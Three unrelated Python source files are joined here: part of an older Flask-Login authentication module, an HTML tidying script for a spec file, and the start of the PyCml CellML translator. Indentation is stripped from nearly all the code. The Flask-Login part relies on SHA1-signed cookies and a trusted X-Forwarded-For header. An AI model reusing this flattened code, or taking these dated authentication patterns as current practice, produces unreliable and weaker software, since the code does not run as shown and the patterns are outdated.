LOGIN_MESSAGE_CATEGORY = 'message'
#: The default flash message to display when users need to reauthenticate.
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
#: The default flash message category to display when users need to
#: reauthenticate.
REFRESH_MESSAGE_CATEGORY = 'message'
#: The default attribute to retrieve the unicode id of the user
ID_ATTRIBUTE = 'get_id'
#: Default name of the auth header (``Authorization``)
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
'''
This object is used to hold the settings used for logging in. Instances of
:class:`LoginManager` are *not* bound to specific apps, so you can create
one in the main body of your code and then bind it to your
app in a factory function.
'''
def __init__(self, app=None, add_context_processor=True):
#: A class or factory function that produces an anonymous user, which
#: is used when no one is logged in.
self.anonymous_user = AnonymousUserMixin
#: The name of the view to redirect to when the user needs to log in.
#: (This can be an absolute URL as well, if your authentication
#: machinery is external to your application.)
self.login_view = None
#: The message to flash when a user is redirected to the login page.
self.login_message = LOGIN_MESSAGE
#: The message category to flash when a user is redirected to the login
#: page.
self.login_message_category = LOGIN_MESSAGE_CATEGORY
#: The name of the view to redirect to when the user needs to
#: reauthenticate.
self.refresh_view = None
#: The message to flash when a user is redirected to the 'needs
#: refresh' page.
self.needs_refresh_message = REFRESH_MESSAGE
#: The message category to flash when a user is redirected to the
#: 'needs refresh' page.
self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
#: The mode to use session protection in. This can be either
#: ``'basic'`` (the default) or ``'strong'``, or ``None`` to disable
#: it.
self.session_protection = 'basic'
#: If present, used to translate flash messages ``self.login_message``
#: and ``self.needs_refresh_message``
self.localize_callback = None
self.token_callback = None
self.user_callback = None
self.unauthorized_callback = None
self.needs_refresh_callback = None
self.id_attribute = ID_ATTRIBUTE
self.header_callback = None
self.request_callback = None
if app is not None:
self.init_app(app, add_context_processor)
def setup_app(self, app, add_context_processor=True): # pragma: no cover
'''
This method has been deprecated. Please use
:meth:`LoginManager.init_app` instead.
'''
warnings.warn('Warning setup_app is deprecated. Please use init_app.',
DeprecationWarning)
self.init_app(app, add_context_processor)
def init_app(self, app, add_context_processor=True):
'''
Configures an application. This registers an `after_request` call, and
attaches this `LoginManager` to it as `app.login_manager`.
:param app: The :class:`flask.Flask` object to configure.
:type app: :class:`flask.Flask`
:param add_context_processor: Whether to add a context processor to
the app that adds a `current_user` variable to the template.
Defaults to ``True``.
:type add_context_processor: bool
'''
app.login_manager = self
app.after_request(self._update_remember_cookie)
self._login_disabled = app.config.get('LOGIN_DISABLED',
app.config.get('TESTING', False))
if add_context_processor:
app.context_processor(_user_context_processor)
def unauthorized(self):
'''
This is called when the user is required to log in. If you register a
callback with :meth:`LoginManager.unauthorized_handler`, then it will
be called. Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.login_message` to the user.
- Redirect the user to `login_view`. (The page they were attempting
to access will be passed in the ``next`` query string variable,
so you can redirect there if present instead of the homepage.)
If :attr:`LoginManager.login_view` is not defined, then it will simply
raise a HTTP 401 (Unauthorized) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_unauthorized.send(current_app._get_current_object())
if self.unauthorized_callback:
return self.unauthorized_callback()
if not self.login_view:
abort(401)
if self.login_message:
if self.localize_callback is not None:
flash(self.localize_callback(self.login_message),
category=self.login_message_category)
else:
flash(self.login_message, category=self.login_message_category)
return redirect(login_url(self.login_view, request.url))
def user_loader(self, callback):
'''
This sets the callback for reloading a user from the session. The
function you set should take a user ID (a ``unicode``) and return a
user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.user_callback = callback
return callback
def header_loader(self, callback):
'''
This sets the callback for loading a user from a header value.
The function you set should take an authentication token and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.header_callback = callback
return callback
def request_loader(self, callback):
'''
This sets the callback for loading a user from a Flask request.
The function you set should take Flask request object and
return a user object, or `None` if the user does not exist.
:param callback: The callback for retrieving a user object.
'''
self.request_callback = callback
return callback
def token_loader(self, callback):
'''
This sets the callback for loading a user from an authentication
token. The function you set should take an authentication token
(a ``unicode``, as returned by a user's `get_auth_token` method) and
return a user object, or ``None`` if the user does not exist.
:param callback: The callback for retrieving a user object.
:type callback: unicode
'''
self.token_callback = callback
return callback
def unauthorized_handler(self, callback):
'''
This will set the callback for the `unauthorized` method, which among
other things is used by `login_required`. It takes no arguments, and
should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.unauthorized_callback = callback
return callback
def needs_refresh_handler(self, callback):
'''
This will set the callback for the `needs_refresh` method, which among
other things is used by `fresh_login_required`. It takes no arguments,
and should return a response to be sent to the user instead of their
normal view.
:param callback: The callback for unauthorized users.
:type callback: function
'''
self.needs_refresh_callback = callback
return callback
def needs_refresh(self):
'''
This is called when the user is logged in, but they need to be
reauthenticated because their session is stale. If you register a
callback with `needs_refresh_handler`, then it will be called.
Otherwise, it will take the following actions:
- Flash :attr:`LoginManager.needs_refresh_message` to the user.
- Redirect the user to :attr:`LoginManager.refresh_view`. (The page
they were attempting to access will be passed in the ``next``
query string variable, so you can redirect there if present
instead of the homepage.)
If :attr:`LoginManager.refresh_view` is not defined, then it will
simply raise a HTTP 403 (Forbidden) error instead.
This should be returned from a view or before/after_request function,
otherwise the redirect will have no effect.
'''
user_needs_refresh.send(current_app._get_current_object())
if self.needs_refresh_callback:
return self.needs_refresh_callback()
if not self.refresh_view:
abort(403)
if self.localize_callback is not None:
flash(self.localize_callback(self.needs_refresh_message),
category=self.needs_refresh_message_category)
else:
flash(self.needs_refresh_message,
category=self.needs_refresh_message_category)
return redirect(login_url(self.refresh_view, request.url))
def reload_user(self, user=None):
ctx = _request_ctx_stack.top
if user is None:
user_id = session.get('user_id')
if user_id is None:
ctx.user = self.anonymous_user()
else:
user = self.user_callback(user_id)
if user is None:
logout_user()
else:
ctx.user = user
else:
ctx.user = user
def _load_user(self):
'''Loads user from session or remember_me cookie as applicable'''
user_accessed.send(current_app._get_current_object())
# first check SESSION_PROTECTION
config = current_app.config
if config.get('SESSION_PROTECTION', self.session_protection):
deleted = self._session_protection()
if deleted:
return self.reload_user()
# If a remember cookie is set, and the session is not, move the
# cookie user ID to the session.
#
# However, the session may have been set if the user has been
# logged out on this request; in that case 'remember' will be set to
# 'clear', so we should check for that and not restore the session.
is_missing_user_id = 'user_id' not in session
if is_missing_user_id:
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
has_cookie = (cookie_name in request.cookies and
session.get('remember') != 'clear')
if has_cookie:
return self._load_from_cookie(request.cookies[cookie_name])
elif header_name in request.headers:
return self._load_from_header(request.headers[header_name])
else:
return self._load_from_request(request)
return self.reload_user()
def _session_protection(self):
sess = session._get_current_object()
ident = _create_identifier()
app = current_app._get_current_object()
mode = app.config.get('SESSION_PROTECTION', self.session_protection)
# if there is no '_id', then take the current one for good
if '_id' not in sess:
sess['_id'] = ident
# if the sess is empty, it's an anonymous user, or just logged out
# so we can skip this, unless 'strong' protection is active,
# in which case we need to double check for the remember me token
check_protection = sess or mode == 'strong'
if check_protection and ident != sess.get('_id', None):
if mode == 'basic' or sess.permanent:
sess['_fresh'] = False
session_protected.send(app)
return False
elif mode == 'strong':
sess.clear()
sess['remember'] = 'clear'
session_protected.send(app)
return True
return False
def _load_from_cookie(self, cookie):
if self.token_callback:
user = self.token_callback(cookie)
if user is not None:
session['user_id'] = getattr(user, self.id_attribute)()
session['_fresh'] = False
_request_ctx_stack.top.user = user
else:
self.reload_user()
else:
user_id = decode_cookie(cookie)
if user_id is not None:
session['user_id'] = user_id
session['_fresh'] = False
self.reload_user()
if _request_ctx_stack.top.user is not None:
app = current_app._get_current_object()
user_loaded_from_cookie.send(app, user=_get_user())
def _load_from_header(self, header):
user = None
if self.header_callback:
user = self.header_callback(header)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_header.send(app, user=_get_user())
else:
self.reload_user()
def _load_from_request(self, request):
user = None
if self.request_callback:
user = self.request_callback(request)
if user is not None:
self.reload_user(user=user)
app = current_app._get_current_object()
user_loaded_from_request.send(app, user=_get_user())
else:
self.reload_user()
def _update_remember_cookie(self, response):
# Don't modify the session unless there's something to do.
if 'remember' in session:
operation = session.pop('remember', None)
if operation == 'set' and 'user_id' in session:
self._set_cookie(response)
elif operation == 'clear':
self._clear_cookie(response)
return response
def _set_cookie(self, response):
# cookie settings
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
# prepare data
if self.token_callback:
data = current_user.get_auth_token()
else:
data = encode_cookie(str(session['user_id']))
expires = datetime.utcnow() + duration
# actually set it
response.set_cookie(cookie_name,
value=data,
expires=expires,
domain=domain,
secure=secure,
httponly=httponly)
def _clear_cookie(self, response):
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
'''
This provides default implementations for the methods that Flask-Login
expects user objects to have.
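Typical use is simply to inherit from it; here ``db`` is a
hypothetical Flask-SQLAlchemy instance::

    class User(UserMixin, db.Model):
        id = db.Column(db.Integer, primary_key=True)
        email = db.Column(db.String(120), unique=True)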
'''
def is_active(self):
return True
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id)
except AttributeError:
raise NotImplementedError('No `id` attribute - override `get_id`')
def __eq__(self, other):
'''
Checks the equality of two `UserMixin` objects using `get_id`.
'''
if isinstance(other, UserMixin):
return self.get_id() == other.get_id()
return NotImplemented
def __ne__(self, other):
'''
Checks the inequality of two `UserMixin` objects using `get_id`.
'''
equal = self.__eq__(other)
if equal is NotImplemented:
return NotImplemented
return not equal
if sys.version_info[0] != 2: # pragma: no cover
# Python 3 implicitly sets __hash__ to None if we override __eq__
# We set it back to its default implementation
__hash__ = object.__hash__
class AnonymousUserMixin(object):
'''
This is the default object for representing an anonymous user.
'''
def is_authenticated(self):
return False
def is_active(self):
return False
def is_anonymous(self):
return True
def get_id(self):
return
def encode_cookie(payload):
'''
This will encode a ``unicode`` value into a cookie, and sign that cookie
with the app's secret key.
:param payload: The value to encode, as `unicode`.
:type payload: unicode
'''
return u'{0}|{1}'.format(payload, _cookie_digest(payload))
def decode_cookie(cookie):
'''
This decodes a cookie given by `encode_cookie`. If verification of the
cookie fails, ``None`` will be implicitly returned.
:param cookie: An encoded cookie.
:type cookie: str
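Within an application context (so a ``SECRET_KEY`` is available), the
two functions round-trip::

    >>> decode_cookie(encode_cookie(u'42'))
    u'42'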
'''
try:
payload, digest = cookie.rsplit(u'|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii') # pragma: no cover
except ValueError:
return
if safe_str_cmp(_cookie_digest(payload), digest):
return payload
def make_next_param(login_url, current_url):
'''
Reduces the scheme and host from a given URL so it can be passed to
the given `login` URL more efficiently.
:param login_url: The login URL being redirected to.
:type login_url: str
:param current_url: The URL to reduce.
:type current_url: str
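For example, a relative login URL lets the scheme and host be dropped::

    >>> make_next_param('/login', u'http://localhost/profile')
    u'/profile'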
'''
l = urlparse(login_url)
c = urlparse(current_url)
if (not l.scheme or l.scheme == c.scheme) and \
(not l.netloc or l.netloc == c.netloc):
return urlunparse(('', '', c.path, c.params, c.query, ''))
return current_url
def login_url(login_view, next_url=None, next_field='next'):
'''
Creates a URL for redirecting to a login page. If only `login_view` is
provided, this will just return the URL for it. If `next_url` is provided,
however, this will append a ``next=URL`` parameter to the query string
so that the login view can redirect back to that URL.
:param login_view: The name of the login view. (Alternately, the actual
URL to the login view.)
:type login_view: str
:param next_url: The URL to give the login view for redirection.
:type next_url: str
:param next_field: What field to store the next URL in. (It defaults to
``next``.)
:type next_field: str
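A sketch of typical behaviour with a literal login URL (the exact
quoting comes from Werkzeug)::

    >>> login_url('/login', next_url=u'http://localhost/comment?id=3')
    '/login?next=%2Fcomment%3Fid%3D3'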
'''
if login_view.startswith(('https://', 'http://', '/')):
base = login_view
else:
base = url_for(login_view)
if next_url is None:
return base
parts = list(urlparse(base))
md = url_decode(parts[4])
md[next_field] = make_next_param(base, next_url)
parts[4] = url_encode(md, sort=True)
return urlunparse(parts)
def make_secure_token(*args, **options):
'''
This will create a secure token that you can use as an authentication
token for your users. It uses heavy-duty HMAC signing to prevent people
from guessing the information. (To make it even more effective, if you
will never need to regenerate the token, you can pass some random data
as one of the arguments.)
:param \*args: The data to include in the token.
:type args: args
:param \*\*options: To manually specify a secret key, pass ``key=THE_KEY``.
Otherwise, the ``current_app`` secret key will be used.
:type \*\*options: kwargs
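A minimal sketch (in practice the key comes from the app's
``SECRET_KEY`` unless one is passed explicitly)::

    token = make_secure_token(u'alice', u'1387471',
                              key=b'not-the-real-secret')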
'''
key = options.get('key')
key = _secret_key(key)
l = [s if isinstance(s, bytes) else s.encode('utf-8') for s in args]
payload = b'\0'.join(l)
token_value = hmac.new(key, payload, sha1).hexdigest()
if hasattr(token_value, 'decode'): # pragma: no cover
token_value = token_value.decode('utf-8') # ensure unicode
return token_value
def login_fresh():
'''
This returns ``True`` if the current login is fresh.
'''
return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
'''
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` method returns ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
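A hypothetical login view (``check_password`` and ``form`` are
illustrative names) might end with::

    if user is not None and user.check_password(form.password.data):
        login_user(user, remember=True)
        return redirect(request.args.get('next') or url_for('index'))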
'''
if not force and not user.is_active():
return False
user_id = getattr(user, current_app.login_manager.id_attribute)()
session['user_id'] = user_id
session['_fresh'] = True
session['_id'] = _create_identifier()
if remember:
session['remember'] = 'set'
_request_ctx_stack.top.user = user
user_logged_in.send(current_app._get_current_object(), user=_get_user())
return True
def logout_user():
'''
Logs a user out. (You do not need to pass the actual user.) This will
also clean up the remember me cookie if it exists.
'''
if 'user_id' in session:
session.pop('user_id')
if '_fresh' in session:
session.pop('_fresh')
cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
if cookie_name in request.cookies:
session['remember'] = 'clear'
user = _get_user()
if user and not user.is_anonymous():
user_logged_out.send(current_app._get_current_object(), user=user)
current_app.login_manager.reload_user()
return True
def confirm_login():
'''
This sets the current session as fresh. Sessions become stale when they
are reloaded from a cookie.
'''
session['_fresh'] = True
session['_id'] = _create_identifier()
user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
'''
If you decorate a view with this, it will ensure that the current user is
logged in and authenticated before calling the actual view. (If they are
not, it calls the :attr:`LoginManager.unauthorized` callback.) For
example::
@app.route('/post')
@login_required
def post():
pass
If there are only certain times you need to require that your user is
logged in, you can do so with::
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
...which is essentially the code that this function adds to your views.
It can be convenient to globally turn off authentication when unit
testing. To enable this, if either of the application
configuration variables `LOGIN_DISABLED` or `TESTING` is set to
`True`, this decorator will be ignored.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
return func(*args, **kwargs)
return decorated_view
def fresh_login_required(func):
'''
If you decorate a view with this, it will ensure that the current user's
login is fresh - i.e. their session was not restored from a 'remember me'
cookie. Sensitive operations, like changing a password or e-mail, should
be protected with this, to impede the efforts of cookie thieves.
If the user is not authenticated, :meth:`LoginManager.unauthorized` is
called as normal. If they are authenticated, but their session is not
fresh, it will call :meth:`LoginManager.needs_refresh` instead. (In that
case, you will need to provide a :attr:`LoginManager.refresh_view`.)
Behaves identically to the :func:`login_required` decorator with respect
to configuration variables.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
elif not login_fresh():
return current_app.login_manager.needs_refresh()
return func(*args, **kwargs)
return decorated_view
def _get_user():
if has_request_context() and not hasattr(_request_ctx_stack.top, 'user'):
current_app.login_manager._load_user()
return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
key = _secret_key(key)
return hmac.new(key, payload.encode('utf-8'), sha1).hexdigest()
def _get_remote_addr():
address = request.headers.get('X-Forwarded-For', request.remote_addr)
if address is not None:
address = address.encode('utf-8')
return address
def _create_identifier():
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
if str is bytes:
base = unicode(base, 'utf-8', errors='replace') # pragma: no cover
h = md5()
h.update(base.encode('utf8'))
return h.hexdigest()
def _user_context_processor():
return dict(current_user=_get_user())
def _secret_key(key=None):
if key is None:
key = current_app.config['SECRET_KEY']
if isinstance(key, unicode): # pragma: no cover
key = key.encode('latin1') # ensure bytes
return key
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
#: called for a normal login.)
#: It receives no additional arguments besides the app.
user_login_confirmed = _signals.signal('login-confirmed')
#: Sent when the `unauthorized` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_unauthorized = _signals.signal('unauthorized')
#: Sent when the `needs_refresh` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_needs_refresh = _signals.signal('needs-refresh')
#: Sent whenever the user is accessed/loaded. It receives no additional
#: arguments besides the app.
user_accessed = _signals.signal('accessed')
#: Sent whenever session protection takes effect, and a session is either
#: marked non-fresh or deleted. It receives no additional arguments besides
#: the app.
session_protected = _signals.signal('session-protected')
|
#!/usr/bin/env python
##
# Python script to tidy mediasession.bs
#
# adapted from: https://github.com/w3c/webvtt/blob/41cac9c211f9c581de466bb9b8b5dd11a160ffad/format.py
##
import re
import sys
# http://stackoverflow.com/q/1732348
pattern = re.compile(r'<(\w+).*?>|</(\w+)>|<!--(.*?)-->', re.DOTALL)
INDENT = ' '
COLUMNS = 80
def hasendtag(name):
return name not in ['br', 'img', 'meta']
def tokenize(source):
offset = 0
for match in pattern.finditer(source):
if match.start() > offset:
yield ('text', offset, match.start(), None)
index = match.lastindex
token = ('open', 'close', 'comment')[index - 1]
name = index < 3 and match.group(index) or None
yield (token, match.start(), match.end(), name)
offset = match.end()
if offset < len(source):
yield ('text', offset, len(source), None)
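# For example (hypothetical input), list(tokenize('<p>Hi</p>')) yields:
#   ('open', 0, 3, 'p'), ('text', 3, 5, None), ('close', 5, 9, 'p')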
def validate(path, source, tokens):
stack = []
def fail(reason, offset):
lineno = source.count('\n', 0, offset) + 1
print '%s:%s: error: %s' % (path, lineno, reason)
print source.splitlines()[lineno - 1]
sys.exit(1)
for token, start, end, name in tokens:
if token == 'open':
if hasendtag(name):
stack.append(name)
elif token == 'close':
if len(stack) == 0 or stack[-1] != name:
fail("close tag '%s' with open tags '%s'" %
(name, ' > '.join(stack)), start)
stack.pop()
if len(stack) > 0:
fail("end of file with open tags '%s'" %
(' > '.join(stack)), len(source) - 1)
class LineWriter:
def __init__(self, path):
self._file = open(path, 'w')
self._data = ''
self._startdepth = 0
def _writelines(self, depth):
lines = [depth * INDENT]
for word in self._data.strip().split():
if lines[-1].isspace() or len(lines[-1]) + len(word) <= COLUMNS:
lines[-1] += word + ' '
else:
lines.append(depth * INDENT + word + ' ')
self._file.write('\n'.join((l.rstrip() for l in lines)))
self._data = ''
def append(self, data):
self._data += data
def verbatim(self, data, depth):
if len(self._data) > 0:
mindepth = min(self._startdepth, depth)
self._writelines(mindepth)
self._file.write(mindepth * INDENT)
self._file.write(data)
def newline(self, depth):
self._writelines(min(self._startdepth, depth))
self._file.write('\n')
self._startdepth = depth
def normalize(path, source, tokens):
lw = LineWriter(path)
stack = []
def depth():
d = 0
for name, merge in stack:
if merge:
break
d += 1
return d
def merging():
for name, merge in stack:
if merge:
return True
return False
def preservespace():
for name, merge in stack:
if name in ('script', 'style', 'pre'):
return True
return False
for token, start, end, name in tokens:
didpreservespace = preservespace()
if token == 'open' and hasendtag(name):
# treat children as single line if followed by non-whitespace
merge = not source[end].isspace()
stack.append((name, merge))
elif token == 'close':
stack.pop()
data = source[start:end]
if preservespace() or didpreservespace:
lw.verbatim(data, depth())
elif token == 'text' and not merging():
# when merging() everything is mangled, but even when not merging(),
# consecutive non-empty lines of text are merged together into as
# few lines as possible.
mergelines = False
while len(data) > 0:
line, ending, data = data.partition('\n')
emptyline = len(line) == 0 or line.isspace()
lastline = len(data) == 0
if mergelines:
if emptyline:
lw.newline(depth())
else:
lw.append(' ')
mergelines = False
if line:
lw.append(line)
if ending:
if emptyline or lastline:
lw.newline(depth())
else:
mergelines = True
else:
lw.append(data)
assert len(stack) == 0
def format(path):
with open(path, 'r') as f:
source = f.read().rstrip() + '\n'
tokens = list(tokenize(source))
assert source == ''.join((source[t[1]:t[2]] for t in tokens))
validate(path, source, tokens)
normalize(path, source, tokens)
if __name__ == '__main__':
format(sys.argv[1])
|
# We want 1/2==0.5
from __future__ import division
"""Copyright (c) 2005-2015, University of Oxford.
All rights reserved.
University of Oxford means the Chancellor, Masters and Scholars of the
University of Oxford, having an administrative office at Wellington
Square, Oxford OX1 2JD, UK.
This file is part of Chaste.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the University of Oxford nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
This part of PyCml deals with converting CellML models into
programming language code, primarily C++ compatible with Chaste, but
supporting a few other languages also (and easily extensible).
"""
import optparse
import os
import re
import time
import sys
from cStringIO import StringIO
# Common CellML processing stuff
import pycml
from pycml import * # Put contents in the local namespace as well
import optimize
import processors
import validator
__version__ = "$Revision: 24914 $"[11:-2]
def version_comment(note_time=True):
"""Generate a version comment, with optional time info."""
if note_time:
t = '\non ' + time.asctime()
else:
t = ''
text = """Processed by pycml - CellML Tools in Python
(translators: %s, pycml: %s, optimize: %s)%s""" % (
__version__, pycml.__version__, optimize.__version__, t)
return text
def debugexpr(e):
"For debugging."
v = None
if isinstance(e, cellml_variable):
v = e
elif isinstance(e, mathml_apply):
v = e.assigned_variable()
if v:
r = (v==e, v.name, v.get_usage_count())
else:
r = (False, '', -1)
return r
class TranslationError(RuntimeError):
"""Error thrown if CellML translation fails."""
pass
class ConfigurationError(ValueError):
"""Error thrown if configuration file is invalid."""
pass
class CellMLTranslator(object):
"""
Base class for translators from CellML to programming languages.
Provides various methods & attributes that can be overridden to
achieve the desired output language and style.
Also contains a registration system for subclasses, so the
command-line client can know what translators are available. See
the register method for more information.
"""
translators = {}
class NameAlreadyRegistered(ValueError):
pass
@classmethod
def register(cls, subclass, name):
"""Register a new translator subclass.
Registers the subclass `subclass' with name `name' in the
translators class attribute of CellMLTranslator. If the name
given is already in use, raises NameAlreadyRegistered.
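For example, a hypothetical new backend would register itself with::

    CellMLTranslator.register(MyLangTranslator, 'mylang')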
"""
if name in cls.translators:
raise cls.NameAlreadyRegistered(name)
cls.translators[name] = subclass
return
@staticmethod
def generate_interface(doc, solver_info):
"""Generate an interface component connecting the model to whatever will use it.
Stub method that subclasses can override to implement this functionality.
"""
pass
###########################
# Various language tokens #
###########################
STMT_END = ';' # End of statement
EQ_ASSIGN = ' = ' # Assignment operator
COMMENT_START = '// ' # Start of a 1 line comment
DOXYGEN_COMMENT_START = '//! ' # Start of a 1 line Doxygen comment
# Variable types
TYPE_DOUBLE = 'double '
TYPE_VOID = 'void '
TYPE_CONST_DOUBLE = 'const double '
TYPE_CONST_UNSIGNED = 'const unsigned '
# Special constants
TRUE = 'true'
FALSE = 'false'
PI = 'M_PI'
E = 'M_E'
NOT_A_NUMBER = 'NAN' # GNU extension, but fairly common
# Whether the target language uses a subsidiary file, such as
# a header file in C/C++
USES_SUBSIDIARY_FILE = False
# Mapping from primary file extension to subsidiary file extension
FILE_EXTENSIONS = {'cpp': 'hpp',
'c': 'h',
'cxx': 'hxx'}
def __init__(self, add_timestamp=True, options=None):
"""Create a translator."""
self.options = options
# Initially output should not be indented
self.indent_level = 0
# Character to indent with
self.indent_char = ' '
# No. of occurrences of indent_char per indent_level
self.indent_factor = 4
# Whether to use lookup tables where possible
self.use_lookup_tables = True
# Whether to add a timestamp comment to generated files
self.add_timestamp = add_timestamp
# Main output goes to the main file by default
self._main_output_to_subsidiary = False
def error(self, lines, xml=None):
"""Raise a translation error.
lines is a list of strings describing what went wrong.
A TranslationError with that message will be raised.
If xml is given, it should be an element, which will be
pretty-printed and included in the error.
"""
if xml is not None:
lines.extend(xml.xml(indent = u'yes',
omitXmlDeclaration = u'yes').split('\n'))
raise TranslationError('\n'.join(lines))
@property
def config(self):
"""Get the current document's configuration store."""
return getattr(self.doc, '_cml_config', None)
def translate(self, doc, model_filename, output_filename=None,
subsidiary_file_name=None,
class_name=None, v_variable=None,
continuation=None,
lookup_method_prefix='', row_lookup_method=False,
lt_index_uses_floor=True, constrain_table_indices=False):
"""Generate code for the given model.
doc should be an instance of cellml_model representing a
valid CellML model, such as might be produced from a call
to
>>> valid, doc = validator.CellMLValidator().validate(
... model_filename, True)
model_filename is the filename of the input model.
The output program will by default be generated in the same
folder, but with a different extension. This can be
overridden by supplying the output_filename keyword argument.
By default the name of the class representing the model will
be derived from the model name. This can be overridden by
passing an alternative as the class_name argument.
The variable representing the transmembrane potential should
be passed in using the v_variable argument.
By default this method will perform some setup and then call
self.output_top_boilerplate()
self.output_mathematics()
self.output_bottom_boilerplate()
To alter this, pass a callable as the continuation parameter;
this will then be called instead.
lookup_method_prefix and row_lookup_method can be used to
customise some aspects of lookup table usage. The former is
used by the Chaste translator to place lookup tables within a
singleton class, while the latter can improve cache
performance by looking up all tables in a single call, and
returning an array of the results.
lt_index_uses_floor specifies whether to use the floor()
function to calculate the index into the lookup tables, or
just cast to unsigned.
constrain_table_indices specifies whether to throw an
exception if lookup table index variables go outside the
bounds specified (default), or just to cap them at the bounds.
"""
self.doc = doc
self.model = doc.model
# Name of the class that will represent this model
if class_name is None:
self.class_name = u'CML_' + doc.model.name.replace('-', '_')
else:
self.class_name = class_name
# Figure out the free & state vars in this model
self.free_vars = doc.model.find_free_vars()
self.state_vars = doc.model.find_state_vars()
if len(self.free_vars) > 1:
self.error(["Model has more than one free variable; exiting.",
"Free vars:" + str(self.free_vars)])
if len(self.free_vars) == 0:
if self.model.get_option('protocol'):
# We may be dealing with an algebraic model; check for an Unknown variable
for var in self.model.get_all_variables():
if var.get_type() == VarTypes.Unknown:
self.free_vars.append(var)
if len(self.free_vars) != 1:
self.error(["Model has no free variable; exiting."])
# If only a single component, don't add it to variable names
self.single_component = (len(getattr(self.model, u'component', [])) == 1)
# Find the (index of the) transmembrane potential
self.v_variable = v_variable
if self.v_variable:
self.v_variable_name = (v_variable.component.name, v_variable.name)
else:
self.v_variable = None
for i, var in enumerate(self.state_vars):
if var is v_variable:
self.v_index = i
break
else:
self.v_index = -1
# Check to see if we're using lookup tables
self.lookup_method_prefix = lookup_method_prefix
self.row_lookup_method = row_lookup_method
self.lt_index_uses_floor = lt_index_uses_floor
self.constrain_table_indices = constrain_table_indices
